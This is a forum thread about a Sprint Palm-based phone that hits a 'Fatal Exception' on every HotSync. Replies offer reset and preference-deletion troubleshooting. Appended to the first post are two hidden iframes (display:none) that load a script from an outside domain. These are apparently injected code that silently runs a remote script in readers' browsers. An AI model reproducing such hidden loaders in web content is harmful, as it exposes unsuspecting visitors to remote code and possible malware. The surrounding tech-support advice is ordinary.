+ Reply to Thread

Cannot setup phone without getting "Fatal Exception" error -- can anyone help?

Here's my problem: I have two phones. I got the first one and installed all my 3d party apps (some crashed, which I then deleted them individually). It works great, except the LCD screen was broken. I called Sprint and they sent me a new phone, which I just got. I figured I could just put the new phone on the cradle and hotsync. It hasn't worked. EVERY time I try it, I get "fatal exception" and have to hard reset. I've tried everything. I have tons of 3d party apps, but no idea which ones could be causing the problem -- if it's that at all. After all, once I even used the custom feature to only install Date book, address, etc. (no install), and I still got the error. Any advice out there? I'm out of ideas and about to call Sprint to tell them to send me a 3d phone. Could it be the phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

first off, im shocked to see you have gotten 2 phones when some folks are having a hard time getting one. and thru sprint no less!! im amazed!!!..

but to your point....

its an app or two u have installed on the phone.. you need to fry its brain again (cold reset) then delete saved prefs on the PC and do a new virgin hotsync.. after that install the apps one by one.. its a pain, but thats you best course at this point... its probably not the phone... be sutre and get the palm 4.0.1 desktop if you dont already have it...

still confused

Thanks for your reply. If that is correct, it begs the question: why does this configuration of apps work well on my current phone? It just doesn't make sense that it work on one phone, and not on another. I think you may have something with saved prefs, however, I'll let you know if that works.

Administrator

Exclamation Unsaved prefs also...

Delete the "unsaved prefs" also!

so you need to zap the saved prefs and unsaved prefs from your backup seciton on your pc BEFORE you do your virgin hotsync!!

this will take out the stuff that was specific only to the 6035 and not to the palm platform in general....

Lightbulb You can also do a warm reset

You don't have to totally detete everything - you can just do what they call a "Warm reset":

To perform a warm reset:

Press and hold the Page Up button on your handheld.

Using the reset tip tool (or a similar object without a sharp tip), gently press the reset button inside the hole on the back panel of your handheld.

When the Palm Computing Platform logo appears on the screen, release the Page Up button.

This will reset without loading any programs up, but you won't loose everything (just like a soft reset, but doesn't load up programs). This will allow you to delete whatever you need to delete that might be causing the problem, then you can soft reset normally and you'll be good to go! Hope this helps.

Angry nothing working

Thanks for the help and suggestions, but so far nothing has worked.

Marc: I deleted Saved Prefs, but didn't see anything called Unsaved Prefs.

minor: I tried your warm reset, but nothing worked. How is it any different than doing a hard reset then not hitting up to erase everything -- it's just a soft reset, right? Either way, I couldn't get your type of reset to do anything, I still kept getting "Fatal Exception" message.

I can't imagine it being any of my programs -- they all work fine on my original unit.

Yeah, it sounds like it must be your device. The warm reset is not exactly like a soft reset because it doesn't load anything except the palm os software at bootup, where a soft reset loads everything (the warm reset is like a mix between a soft and a hard reset). I suggested it because it fixed a similer problem I had when I loaded an incompatible program on my I300. I had the same error message and everything. Well, hopefully you can get the problem resolved soon! Sorry it didn't help!

Administrator

Arrow

i stil think its a bad app or two..

your only other choice is to

fry the brain on the 300 and reinstall the palm 4.0.1 opn the desktop.. THEN install tings one at a time.. thats your best soloution to the problem... of course move your stuff to another part of your hard drive also!

Well, I haven't figured it out, yet. Rather than installing one by one (pain in the ass, because I have about 50 programs), I sold the second phone on e-bay! Made a lot of money, too. Now Sprint has them back in stock and they are sending me a new phone to try again. I'll probably be back on here if the same problem develops.